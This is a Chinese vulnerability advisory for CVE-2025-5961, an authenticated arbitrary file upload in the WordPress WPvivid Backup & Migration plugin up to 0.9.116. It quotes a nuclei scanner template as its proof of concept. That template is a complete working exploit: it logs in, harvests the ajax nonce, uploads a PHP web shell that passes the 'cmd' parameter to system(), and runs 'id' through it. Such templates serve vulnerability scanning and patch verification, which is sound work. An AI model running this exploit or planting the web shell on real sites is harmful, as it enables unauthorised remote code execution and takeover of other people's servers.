WordPress WPvivid Backup & Migration Plugin 任意文件上传漏洞

漏洞信息

漏洞名称： WordPress WPvivid Backup & Migration Plugin 任意文件上传漏洞

漏洞编号：

• CVE： CVE-2025-5961

漏洞类型： 文件上传

漏洞等级： 高危

漏洞描述： WordPress的WPvivid Backup & Migration插件是一款用于网站备份、迁移和暂存的热门插件，广泛应用于需要网站维护和数据迁移的场景。该插件在0.9.116及之前版本中存在一个严重的文件上传漏洞，由于在’wpvivid_upload_import_files’函数中缺少对文件类型的验证，攻击者可以利用这一漏洞上传任意文件，包括PHP文件。这一漏洞的技术根源在于服务器端未能正确验证上传文件的类型和内容，导致攻击者可以绕过安全限制，上传恶意脚本。由于攻击者需要认证后才能利用此漏洞，因此漏洞的利用条件相对较高。然而，一旦攻击成功，攻击者可以实现远程代码执行，进而完全控制系统，访问敏感数据，甚至可能导致服务中断。此漏洞的CVSS评分为8.8，属于高危漏洞，建议用户立即更新到修复版本或移除插件以防止潜在的安全风险。

产品厂商： wpvivid

产品名称： Migration, Backup, Staging – WPvivid Backup & Migration

影响版本： <= 0.9.116

搜索语法： http.component:”wordpress”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/fe5cc942436a4b57889f88f7a026dec73ece6727/http%2Fcves%2F2025%2FCVE-2025-5961.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2025-5961

info:
  name: WordPress WPvivid Backup & Migration Plugin <= 0.9.116 - Authenticated Arbitrary File Upload
  author: pussycat0x
  severity: high
  description: |
    The Migration, Backup, Staging – WPvivid Backup & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'wpvivid_upload_import_files' function in all versions up to, and including, 0.9.116.
  impact: |
    An authenticated attacker can upload arbitrary files, including PHP files, which can lead to remote code execution, complete system compromise, and unauthorized access to sensitive data.
  remediation: |
    Update the WPvivid Backup & Migration plugin to a version that addresses this vulnerability or remove the plugin if no fix is available.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2025-5961
    cwe-id: CWE-434
  metadata:
    max-request: 4
    vendor: wpvivid
    product: migration-backup-staging
    framework: wordpress
    shodan-query: http.component:"wordpress"
  reference:
    - https://github.com/Nxploited/CVE-2025-5961
  tags: cve,cve2025,wordpress,intrusive,wpvivid,plugin,authenticated,file-upload,backup

variables:
  payload: '<?php echo "<br>"; if(isset($_GET["cmd"])){ echo "<pre>"; system($_GET["cmd"]); echo "</pre>"; } ?>'
  cmd: 'id'

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=wpvivid-export-import HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        Accept: */*
        Connection: keep-alive
        Content-Length: 598
        Content-Type: multipart/form-data; boundary=0b9e4b9be0f532af74af1582b95632f2

        --0b9e4b9be0f532af74af1582b95632f2
        Content-Disposition: form-data; name="action"

        wpvivid_upload_import_files
        --0b9e4b9be0f532af74af1582b95632f2
        Content-Disposition: form-data; name="_ajax_nonce"

        {{ajax_nonce}}
        --0b9e4b9be0f532af74af1582b95632f2
        Content-Disposition: form-data; name="async-upload"; filename="{{randstr}}.php"
        Content-Type: application/x-php

        {{payload}}
        --0b9e4b9be0f532af74af1582b95632f2
        Content-Disposition: form-data; name="name"

        {{randstr}}.php
        --0b9e4b9be0f532af74af1582b95632f2--

      - |
        GET wp-content/wpvividbackups/ImportandExport/{{randstr}}.php?cmd={{cmd}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"result":"success"}'

      - type: regex
        part: body
        regex:
          - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)'

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body_2
        group: 1
        internal: true
        name: ajax_nonce
        regex:
          - '"ajax_nonce":"([a-f0-9]+)"'